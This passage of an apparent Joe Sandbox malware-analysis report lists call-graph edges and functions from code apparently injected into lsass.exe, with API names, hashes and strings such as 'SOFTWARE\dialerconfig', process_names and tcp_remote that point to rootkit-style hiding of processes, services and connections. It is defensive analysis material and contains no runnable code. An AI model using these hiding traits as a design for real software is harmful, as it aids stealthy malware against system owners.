6 API calls 15063->15066 15064->15063 15067 202c0af30a2 15065->15067 15068 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15065->15068 15066->15065 15069 202c0af30b7 15067->15069 15070 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15067->15070 15068->15067 15069->15071 15072 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15069->15072 15070->15069 15071->15025 15072->15071 15074 202c0af30d9 15073->15074 15082 202c0af313a 15073->15082 15075 202c0af30f2 15074->15075 15076 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15074->15076 15077 202c0af3104 15075->15077 15078 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15075->15078 15076->15075 15079 202c0af3116 15077->15079 15080 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15077->15080 15078->15077 15081 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15079->15081 15083 202c0af3128 15079->15083 15080->15079 15081->15083 15082->15028 15083->15082 15084 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15083->15084 15084->15082 15086 202c0af0959 15085->15086 15087 202c0af0985 15085->15087 15086->15087 15091 202c0af3174 15086->15091 15087->15043 15090 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15090->15087 15092 202c0af317d 15091->15092 15126 202c0af097d 15091->15126 15127 202c0af3140 15092->15127 15095 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15096 202c0af31a6 15095->15096 15097 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15096->15097 15098 202c0af31b4 15097->15098 15099 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15098->15099 15100 202c0af31c2 15099->15100 15101 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15100->15101 15102 202c0af31d1 15101->15102 15103 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15102->15103 15104 202c0af31dd 15103->15104 15105 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15104->15105 15106 202c0af31e9 15105->15106 15107 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15106->15107 15108 202c0af31f5 15107->15108 15109 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15108->15109 15110 202c0af3203 15109->15110 15111 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15110->15111 15112 202c0af3211 15111->15112 15113 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15112->15113 15114 202c0af321f 15113->15114 15115 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15114->15115 15116 202c0af322d 15115->15116 15117 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15116->15117 15118 202c0af323c 15117->15118 15119 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15118->15119 15120 202c0af3248 15119->15120 15121 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15120->15121 15122 202c0af3254 15121->15122 15123 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15122->15123 15124 202c0af3260 15123->15124 15125 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15124->15125 15125->15126 15126->15090 15128 202c0af3167 15127->15128 15130 202c0af3156 15127->15130 15128->15095 15129 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15129->15130 15130->15128 15130->15129

                                                        Executed Functions

                                                        Function 00000202C0AE253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 202c0ae253c-202c0ae25c0 call 202c0b02cc0 8 202c0ae27d8-202c0ae27fb 5->8 9 202c0ae25c6-202c0ae25c9 5->9 9->8 10 202c0ae25cf-202c0ae25dd 9->10 10->8 11 202c0ae25e3-202c0ae2629 call 202c0ae8c60 * 3 GetFileType 10->11 18 202c0ae2641-202c0ae264b call 202c0ae1a40 11->18 19 202c0ae262b-202c0ae263f StrCpyW 11->19 20 202c0ae2650-202c0ae2654 18->20 19->20 22 202c0ae26ff-202c0ae2704 20->22 23 202c0ae265a-202c0ae2673 call 202c0ae30a8 call 202c0ae3844 20->23 24 202c0ae2707-202c0ae270c 22->24 36 202c0ae26aa-202c0ae26f4 call 202c0b02cc0 23->36 37 202c0ae2675-202c0ae26a4 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 23->37 26 202c0ae270e-202c0ae2711 24->26 27 202c0ae2729 24->27 26->27 29 202c0ae2713-202c0ae2716 26->29 31 202c0ae272c-202c0ae2745 call 202c0ae30a8 call 202c0ae3844 27->31 29->27 32 202c0ae2718-202c0ae271b 29->32 48 202c0ae2787-202c0ae2789 31->48 49 202c0ae2747-202c0ae2776 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 31->49 32->27 35 202c0ae271d-202c0ae2720 32->35 35->27 39 202c0ae2722-202c0ae2727 35->39 36->8 46 202c0ae26fa 36->46 37->8 37->36 39->27 39->31 46->23 50 202c0ae27aa-202c0ae27ad 48->50 51 202c0ae278b-202c0ae27a5 48->51 49->48 69 202c0ae2778-202c0ae2783 49->69 55 202c0ae27af-202c0ae27b5 50->55 56 202c0ae27b7-202c0ae27ba 50->56 51->24 55->8 59 202c0ae27bc-202c0ae27bf 56->59 60 202c0ae27d5 56->60 59->60 63 202c0ae27c1-202c0ae27c4 59->63 60->8 63->60 65 202c0ae27c6-202c0ae27c9 63->65 65->60 67 202c0ae27cb-202c0ae27ce 65->67 67->60 68 202c0ae27d0-202c0ae27d3 67->68 68->8 68->60 69->8 70 202c0ae2785 69->70 70->24
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 383afa285ac380fd55eaa2c4cb7d261a7defb1f4293108ecd3c580df2b121f06
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 517190362047C1C6F625DF2998CC3AE7794F389B84F560127DFAA53B8ADA35CA598700
                                                        Function 00000202C0AE202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 72 202c0ae202c-202c0ae2057 call 202c0b02d00 74 202c0ae205d-202c0ae2066 72->74 75 202c0ae206f-202c0ae2072 74->75 76 202c0ae2068-202c0ae206c 74->76 77 202c0ae2078-202c0ae207b 75->77 78 202c0ae2223-202c0ae2243 75->78 76->75 79 202c0ae2081-202c0ae2093 77->79 80 202c0ae2173-202c0ae2176 77->80 79->78 81 202c0ae2099-202c0ae20a5 79->81 82 202c0ae2178-202c0ae2192 call 202c0ae2f04 80->82 83 202c0ae21e7-202c0ae21ea 80->83 84 202c0ae20a7-202c0ae20b7 81->84 85 202c0ae20d3-202c0ae20de call 202c0ae1bbc 81->85 82->78 92 202c0ae2198-202c0ae21ae 82->92 83->78 86 202c0ae21ec-202c0ae21ff call 202c0ae2f04 83->86 84->85 88 202c0ae20b9-202c0ae20d1 StrCmpNIW 84->88 93 202c0ae20ff-202c0ae2111 85->93 98 202c0ae20e0-202c0ae20f8 call 202c0ae1bf4 85->98 86->78 97 202c0ae2201-202c0ae2209 86->97 88->85 88->93 92->78 96 202c0ae21b0-202c0ae21cc 92->96 99 202c0ae2121-202c0ae2123 93->99 100 202c0ae2113-202c0ae2115 93->100 101 202c0ae21d0-202c0ae21e3 96->101 97->78 104 202c0ae220b-202c0ae2213 97->104 98->93 114 202c0ae20fa-202c0ae20fd 98->114 102 202c0ae212a 99->102 103 202c0ae2125-202c0ae2128 99->103 106 202c0ae211c-202c0ae211f 100->106 107 202c0ae2117-202c0ae211a 100->107 101->101 109 202c0ae21e5 101->109 108 202c0ae212d-202c0ae2130 102->108 103->108 110 202c0ae2216-202c0ae2221 104->110 106->108 107->108 112 202c0ae213e-202c0ae2141 108->112 113 202c0ae2132-202c0ae2138 108->113 109->78 110->78 110->110 112->78 115 202c0ae2147-202c0ae214b 112->115 113->81 113->112 114->108 116 202c0ae214d-202c0ae2150 115->116 117 202c0ae2162-202c0ae216e 115->117 116->78 118 202c0ae2156-202c0ae215b 116->118 117->78 118->115 119 202c0ae215d 118->119 119->78
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: S$dialer
                                                        • API String ID: 756756679-3873981283
                                                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction ID: 7d0801e181e7e1027f0f2556f8cd6da4d5c454e321737ababf7947f23bb56196
                                                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction Fuzzy Hash: 5651AC32B107A4C6FB61CF29E88C6AD63E5F704784F069123DFA512B86DB35C969C300
                                                        Function 00000202C0AE1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 8c3d5dbfacf504bca622ea7f657326f4a67cd1e3c1ec290e5004b19a988dad2d
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BCF01922304781D2FB608B21E8CC76D6765F748BC8F958123DB994B966DA2DC68DCB00
                                                        Function 00000202C0AE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 14bf7bafefd4b55b8bc325b1bb0149ce76066631eeb9ae1ebb85862f094286e6
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 48E03936601704C6FB048B62D84C34A36E5EB89B06F0681268B0907362DF7E8499C750
                                                        Function 00000202C0AE328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 435a5f88e7c6a6dd218e0f6004eb37f2790bd4aa4d5b291e1e8191fef771e2ad
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: A8119672618782D2F760D721F8CDB6D2294BB54748F528127ABB6497A3EF78C46C8240
                                                        Function 00000202C0AE1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                          • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                        • Sleep.KERNEL32 ref: 00000202C0AE1AD7
                                                        • SleepEx.KERNELBASE ref: 00000202C0AE1ADD
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 1519724245a59a03f973eddcebe70884a6cccd966baeab2eab41fd8751cf1259
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: ED31C071200BE1C1FF509B26DACD3AD53A5AB84FC4F0654239FA987697FE14C879C210
                                                        Function 00000202C0AB273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 202c0ab273c-202c0ab27a4 call 202c0ab29d4 * 4 186 202c0ab27aa-202c0ab27ad 177->186 187 202c0ab29b2 177->187 186->187 188 202c0ab27b3-202c0ab27b6 186->188 189 202c0ab29b4-202c0ab29d0 187->189 188->187 190 202c0ab27bc-202c0ab27bf 188->190 190->187 191 202c0ab27c5-202c0ab27e6 190->191 191->187 193 202c0ab27ec-202c0ab280c 191->193 194 202c0ab280e-202c0ab2836 193->194 195 202c0ab2838-202c0ab283f 193->195 194->194 194->195 196 202c0ab28df-202c0ab28e6 195->196 197 202c0ab2845-202c0ab2852 195->197 198 202c0ab28ec-202c0ab2901 196->198 199 202c0ab2992-202c0ab29b0 196->199 197->196 200 202c0ab2858-202c0ab286a LoadLibraryA 197->200 198->199 201 202c0ab2907 198->201 199->189 202 202c0ab286c-202c0ab2878 200->202 203 202c0ab28ca-202c0ab28d2 200->203 206 202c0ab290d-202c0ab2921 201->206 207 202c0ab28c5-202c0ab28c8 202->207 203->200 204 202c0ab28d4-202c0ab28d9 203->204 204->196 209 202c0ab2923-202c0ab2934 206->209 210 202c0ab2982-202c0ab298c 206->210 207->203 208 202c0ab287a-202c0ab287d 207->208 211 202c0ab287f-202c0ab28a5 208->211 212 202c0ab28a7-202c0ab28b7 208->212 214 202c0ab293f-202c0ab2943 209->214 215 202c0ab2936-202c0ab293d 209->215 210->199 210->206 216 202c0ab28ba-202c0ab28c1 211->216 212->216 218 202c0ab294d-202c0ab2951 214->218 219 202c0ab2945-202c0ab294b 214->219 217 202c0ab2970-202c0ab2980 215->217 216->207 217->209 217->210 220 202c0ab2963-202c0ab2967 218->220 221 202c0ab2953-202c0ab2961 218->221 219->217 220->217 223 202c0ab2969-202c0ab296c 220->223 221->217 223->217
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: e9c472418be9705004432d1361e805bb540b7ad58247b10c253449de9ed0d722
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 8161DF72B01790C7EB648F15908C76DB3A2FB54BA4F598127DF5D0778ADA38D86AC700
                                                        Function 00000202C0AED6CC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 224 202c0aed6cc-202c0aed6db 225 202c0aed6dd-202c0aed6e9 224->225 226 202c0aed6eb-202c0aed6fb 224->226 225->226 227 202c0aed72e-202c0aed739 call 202c0aed6ac 225->227 228 202c0aed712-202c0aed72a HeapAlloc 226->228 232 202c0aed73b-202c0aed740 227->232 230 202c0aed6fd-202c0aed704 call 202c0af0720 228->230 231 202c0aed72c 228->231 230->227 236 202c0aed706-202c0aed710 call 202c0aeb85c 230->236 231->232 236->227 236->228
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction ID: f1c622e14429a0b520057bbb946f3f429c66e82a7f768f9b6ab0a37ff79ad3e0
                                                        • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction Fuzzy Hash: E4F0E998311780C1FE546B6699CD39D22845F88BC0F0E5437CF9A867D3EE1CC4AC8620

                                                        Non-executed Functions

                                                        Function 00000202C0AE2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 490 202c0ae2b2c-202c0ae2ba5 call 202c0b02ce0 493 202c0ae2ee0-202c0ae2f03 490->493 494 202c0ae2bab-202c0ae2bb1 490->494 494->493 495 202c0ae2bb7-202c0ae2bba 494->495 495->493 496 202c0ae2bc0-202c0ae2bc3 495->496 496->493 497 202c0ae2bc9-202c0ae2bd9 GetModuleHandleA 496->497 498 202c0ae2bed 497->498 499 202c0ae2bdb-202c0ae2beb GetProcAddress 497->499 500 202c0ae2bf0-202c0ae2c0e 498->500 499->500 500->493 502 202c0ae2c14-202c0ae2c33 StrCmpNIW 500->502 502->493 503 202c0ae2c39-202c0ae2c3d 502->503 503->493 504 202c0ae2c43-202c0ae2c4d 503->504 504->493 505 202c0ae2c53-202c0ae2c5a 504->505 505->493 506 202c0ae2c60-202c0ae2c73 505->506 507 202c0ae2c75-202c0ae2c81 506->507 508 202c0ae2c83 506->508 509 202c0ae2c86-202c0ae2c8a 507->509 508->509 510 202c0ae2c8c-202c0ae2c98 509->510 511 202c0ae2c9a 509->511 512 202c0ae2c9d-202c0ae2ca7 510->512 511->512 513 202c0ae2d9d-202c0ae2da1 512->513 514 202c0ae2cad-202c0ae2cb0 512->514 517 202c0ae2da7-202c0ae2daa 513->517 518 202c0ae2ed2-202c0ae2eda 513->518 515 202c0ae2cc2-202c0ae2ccc 514->515 516 202c0ae2cb2-202c0ae2cbf call 202c0ae199c 514->516 520 202c0ae2d00-202c0ae2d0a 515->520 521 202c0ae2cce-202c0ae2cdb 515->521 516->515 522 202c0ae2dac-202c0ae2db8 call 202c0ae199c 517->522 523 202c0ae2dbb-202c0ae2dc5 517->523 518->493 518->506 528 202c0ae2d0c-202c0ae2d19 520->528 529 202c0ae2d3a-202c0ae2d3d 520->529 521->520 527 202c0ae2cdd-202c0ae2cea 521->527 522->523 524 202c0ae2dc7-202c0ae2dd4 523->524 525 202c0ae2df5-202c0ae2df8 523->525 524->525 534 202c0ae2dd6-202c0ae2de3 524->534 535 202c0ae2dfa-202c0ae2e03 call 202c0ae1bbc 525->535 536 202c0ae2e05-202c0ae2e12 lstrlenW 525->536 537 202c0ae2ced-202c0ae2cf3 527->537 528->529 538 202c0ae2d1b-202c0ae2d28 528->538 531 202c0ae2d3f-202c0ae2d49 call 202c0ae1bbc 529->531 532 202c0ae2d4b-202c0ae2d58 lstrlenW 529->532 531->532 545 202c0ae2d93-202c0ae2d98 531->545 540 202c0ae2d5a-202c0ae2d64 532->540 541 202c0ae2d7b-202c0ae2d8d call 202c0ae3844 532->541 542 202c0ae2de6-202c0ae2dec 534->542 535->536 553 202c0ae2e4a-202c0ae2e55 535->553 546 202c0ae2e14-202c0ae2e1e 536->546 547 202c0ae2e35-202c0ae2e3f call 202c0ae3844 536->547 544 202c0ae2cf9-202c0ae2cfe 537->544 537->545 548 202c0ae2d2b-202c0ae2d31 538->548 540->541 551 202c0ae2d66-202c0ae2d79 call 202c0ae152c 540->551 541->545 556 202c0ae2e42-202c0ae2e44 541->556 552 202c0ae2dee-202c0ae2df3 542->552 542->553 544->520 544->537 545->556 546->547 557 202c0ae2e20-202c0ae2e33 call 202c0ae152c 546->557 547->556 548->545 558 202c0ae2d33-202c0ae2d38 548->558 551->541 551->545 552->525 552->542 560 202c0ae2ecc-202c0ae2ed0 553->560 561 202c0ae2e57-202c0ae2e5b 553->561 556->518 556->553 557->547 557->553 558->529 558->548 560->518 565 202c0ae2e5d-202c0ae2e61 561->565 566 202c0ae2e63-202c0ae2e7d call 202c0ae85c0 561->566 565->566 569 202c0ae2e80-202c0ae2e83 565->569 566->569 572 202c0ae2ea6-202c0ae2ea9 569->572 573 202c0ae2e85-202c0ae2ea3 call 202c0ae85c0 569->573 572->560 575 202c0ae2eab-202c0ae2ec9 call 202c0ae85c0 572->575 573->572 575->560
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 629c2a77cc7c689ebc2a82fae016c29b45818ce3604cad8590d8ad8b42d26791
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 8BB18B62210BA0C6FB688F25C8CC7AD67A5F744B88F565017EF9953796EB35CC68C340
                                                        Function 00000202C0AE7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 43f65ee015122b04127526cc5c334c21e5a52d8fe7862f76cef395083f707644
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 74311972205B80CAFB609F60E8887ED6364F784744F45442BDB8E57A9AEF39C658C710
                                                        Function 00000202C0AED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 3629953f5db9c1b5f8070e01c3cc1c8c2a667b2e639c3edd282c0df2f16cc2f9
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FF314F36214B80C6EB60CF25E88879E73A4F789758F550127EB9D47BA6EF38C559CB00
                                                        Function 00000202C0AE1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 1d03e476145ce09beb9e97f2b7c5aab0935724522098279c66d9844aa9511552
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: F2710636210B50C6FB109F25E8DCA9D23A9FB84F88F425123DB9E47B6ADE39C458C744
